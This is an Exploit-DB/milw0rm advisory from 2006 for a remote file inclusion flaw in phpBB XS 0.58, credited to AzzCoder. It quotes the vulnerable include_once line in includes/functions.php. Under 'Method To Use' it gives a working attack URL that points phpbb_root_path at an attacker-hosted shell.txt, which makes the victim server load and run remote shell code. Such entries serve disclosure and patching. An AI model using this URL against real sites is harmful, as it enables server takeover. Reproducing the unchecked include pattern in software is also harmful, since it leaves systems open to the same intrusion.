phpBB XS 0.58 - 'functions.php' Remote File Inclusion

EDB-ID:

2349

Author:

AzzCoder

Type:

webapps

Platform:

PHP

Published:

2006-09-12

Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# milw0rm.com [2006-09-12]